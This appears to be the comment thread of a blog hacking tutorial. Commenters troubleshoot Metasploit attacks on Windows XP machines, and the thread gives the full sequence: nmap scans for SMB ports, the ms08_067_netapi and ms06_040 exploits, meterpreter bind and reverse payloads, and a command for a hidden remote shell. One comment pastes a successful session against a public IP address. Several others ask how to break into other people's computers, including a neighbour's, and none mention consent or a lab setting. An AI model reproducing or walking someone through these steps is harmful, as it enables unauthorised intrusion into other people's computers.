Actions

Information

37 responses

13 07 2008
baku

hello
“The value specified for PAYLOAD is not valid.” my pc said me this error. how can i fix?? help me pls

13 07 2008
N0F@T3

Actually I realized I made a mistake writing the tutorial.
Here is the right command:
set PAYLOAD windows/meterpreter/bind_tcp

26 09 2008
vivi

Hello,

I have work from windows not from debian. Everything worked fine but the end was not good. I received: “Windows XP SP2 is not exploitable” after the last command as you can see:

msf exploit(ms06_040_netapi) > exploit
[*] Started bind handler
[*] Windows XP SP2 is not exploitable

What can I do?

5 10 2008
G33k

Please tell me How to hack from XP to XP
i can’t understand only this line:
“Let’s open the target’s CMD: “execute -f cmd.exe -c -H -i”

i use XP

6 10 2008
mcfex

when i exploit… the step i follow n success.. but when i run exploit… the console appear “calling the vulnerable functions”… what its mean… the exploit stuck on this after word.

9 10 2008
N0F@T3

@Vivi:
It seems that Microsoft has released a fix for Windows XP SP2…
Unfortunatelly you cannot perform this exploit SP2 PCs…

@G33k:
After you exploit the remote PC you should see “meterpeter>” in the console…
To open the exploited PCs CMD just type “execute -f cmd.exe -c -H -i”.

@Mcfex:
“calling the vulnerable functions” means that metasploit is trying to run the exploit in the other computer…
If it stucks there it might mean several things:
1. The Remote PC is not logged in as an Admin.
2. YOUR PC is not logged in as an Admin.
3. The Remote PC is protected by a FireWall (eg. ZoneAlarm).
4. YOUR PC is protected by a FireWall.
5. Your Metasploit version is outdated.

Thanks for reading!
My New Site!

27 10 2008
darkfire

i am getting the following error “[-] Exploit failed: Login Failed: The SMB server did not reply to our request” how do i fix this?

13 12 2008
pcador

when i use “exploit” i get this message

exploit failed: the following option failed to validate: DLL.

do you know why?

20 01 2009
MinSteRexS

>> use windows/smb/ms08_067_netapi

>> set RHOST 125.162.5.188

RHOST => 125.162.5.188

>> set PAYLOAD windows/meterpreter/bind_tcp

PAYLOAD => windows/meterpreter/bind_tcp

>> set TARGET 0

TARGET => 0

>> exploit

[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability…
[*] Transmitting intermediate stager for over-sized stage…(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage…
[*] Uploading DLL (75787 bytes)…
[*] Upload completed.

>> sysinfo

[*] Meterpreter session 8 opened (192.168.1.3:4397 -> 125.162.5.188:4444)

Computer: VIP-MOTOR
OS : Windows XP (Build 2600, Service Pack 2).

>> execute -f cmd.exe -c -H -i

Process 1408 created.
Channel 8 created.
:) thanks 2 u –> N0F@T3
hack is easy.

to all : please update ur msploit…
scan with nmap for open port 445 before u try
nmap host -p 445

31 03 2009
sylar

i’m new in this and i don’t why this says:
“Exploit failed: The connection timed out”
when i enter the command: “exploit”

20 05 2009
debu99ed

here’s my output.. can u please explain wut this means ?

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability…
[*] Exploit completed, but no session was created.

Thanks dude :)

17 08 2009
a@b.com

can the hacking be done in the following condition?

PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp closed microsoft-ds
1900/tcp closed upnp
2869/tcp closed unknown
3306/tcp closed mysql

18 08 2009
Jama

Hi

Thankx for the tutorial. Is this hacking shared files or hacking the whole C:\?

2 09 2009
ss

Actually the payload windows/meterpreter/bind_tcp no longer works. Anyway, it do not work even with 445 tcp port open.

18 09 2009
Hobo

a@b, it’s impossible to tell with just a portscan… you’d need to probably do a more invasive RPC scan to determine the SP.

18 11 2009
tripz0r

Hello i done that all …Got ip addres where is 445 opened port ,and sp 1 ,but on the end tell me “exploit completed ,but no session created” ???? Please help me what to do mate plz :)

15 12 2009
Sl45h3R

Use

use windows/meterpreter/reverse_tcp
23 12 2009
Arun

m getting the same msg “exploit completed ,but no session created”
what does this means..?

30 12 2009
manshoezz

same problem.

[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability…
[*] Exploit completed, but no session was created.

any body can explain that???

3 01 2010
Dr0idL0cK

Guys DON’T use the “meterpreter/bind_tcp” payload.You dont get a session cause the target pc is behind a firewall.Use “meterpreter/reverse_tcp” instead and also specify your ip address by “set LHOST “.That will work.

Cheers

8 02 2010
esca

on the LAN it works perfect but remote evry time it says exploit completed but no seasson was created I scaned evry port on the computer and I now the remote computer but like I SEED
Do you have any solutions aboute this

22 02 2010
NRAW

Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[-] Exploit failed: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[*] Exploit completed, but no session was created.

20 05 2010
Quotable

I have the same problem as NRAW.. please someone who knows how to hack into it without getting this message.. help :)

24 05 2010
z@ki

for me my problem is when i do evry thing the metsploit close

23 01 2011
chrisk

Try to download the Metasploit again or from an other source.

28 05 2010
Sagar Sen

hello ol, i saw ur tut, nd its nice, bt the problm is that “nmap” cant do all the works. If port 445 is open, it doesnt mean the target is vulnerable to ms08_067 or ms06_040 or others. u can use “nessus” to scan for the vulnerability of a target. Dear frnds u r getting the messages like “[*] Exploit completed, but no session was created” etc ,just bcoz of the system is not vulnerable to dat particular exploit. There is no problem with the PAYLOAD “bind_tcp”/// So if u wana see the target is vulnerable or not use vulnerability scanner like—->
Nessus ,GFI languard, Retina , Sara(linux), SAINT . Go nd Hack……

11 09 2010
young_hack

Pls how can this hack be done, attacking from a windows pc to another windows pc since linux’ Terminal commands are kinda different windows CMD

26 09 2010
Tanmay

hey, can u plz tell me one little thing !!
when i type “exploit” it starts the bind handler but then later says “lang:Unknown”….wat shud i do. PLEASE HELP ME .
thnx.

15 01 2011
Chrisk

When I scan the remote PC with the nmap -sS -O , it says me that probably the host is down and asks me to write nmap -PN and then it finds the host…
But…
I’m running metasploit and after I set the RHOST, RPORT, SMBPIPE, TARGET and PAYLOAD, it says:
Time out
The exploit completed but no session was started…
Then I check the remote PC and I find out that it’s connected to internet…

What can I do to connect to the remote computer?

*I have been trying to connect to many PCs and Metasploit was giving me the same result:
Time out
The exploit completed but no session started

25 01 2011
Cotter

windows/smb/ms08_067_netapi didnt work for me so i used windows/smb/ms10_061_spoolss

and had no trouble

2 04 2011
wai

net use X: \\\C mypass /user:n0f4t3
why this command cannot work? The error is:
“System error 53 has occurred”
“System error 67 has occurred”
Please help, thanx….

2 04 2011
wai

sorry, type wrong…should be: net use X: \\\C mypass /user:n0f4t3

2 05 2011
Nicholas

Which metasploit to open.

2 05 2011
Nicholas

does this work on ethernet

4 05 2011
nicholas

can you make it work windows 7

19 05 2011
faxe

Hi,
how do you “find” the remote pc,
how do you now its IP adress for example?
If for example, I would like to hack into my PC next door, (without looking at the Internetprotocol, and assuming I do not use the same internet connection as the pc), how could I ever find out any information about this computer?

Thanks,
Faxe

9 07 2011
ahmed

sir
i do this
We download nmap (nmap.org) so that we can scan the remote pc.
– On the terminal we write: nmap -sS -O
– If you see that ports 139 TCP and 445 TCP are open then everything is exactly as we want it to be.
– Now we download Metasploit (metasploit.org) and we open it via the Terminal.
– Now that Metasploit is running we start the attack.
– We write at the terminal “show exploits” and we get a list of the avaliable exploits.
– We choose the exploit “ms08_067_netapi” by writing “use windows/smb/ms08_067_netapi”
– Now we set RHOST to our victims ip: “set RHOST ”
– And RPORT to 445: “set RPORT 445″
– Now we write “set SMBPIPE SRVSVC” and hit ENTER and then “set TARGET 0″ and hit ENTER again.
– OK! Let’s set the Payload: “set PAYLOAD windows/meterpreter/bind_tcp”
– IT’S TIME TO HACK THE COMPUTER!!!! Write “exploit” and hit ENTER.

but its not working that showing erorr

[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability…
[*] Exploit completed, but no session was created.
i am useing lan card networking .and also both computer have window xp2002 sp2 .and fire wal is off and no anti-vairs instalid.. what i need more supporting softwer
plz help me how can solve it

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s




Follow

Get every new post delivered to your Inbox.

%d bloggers like this: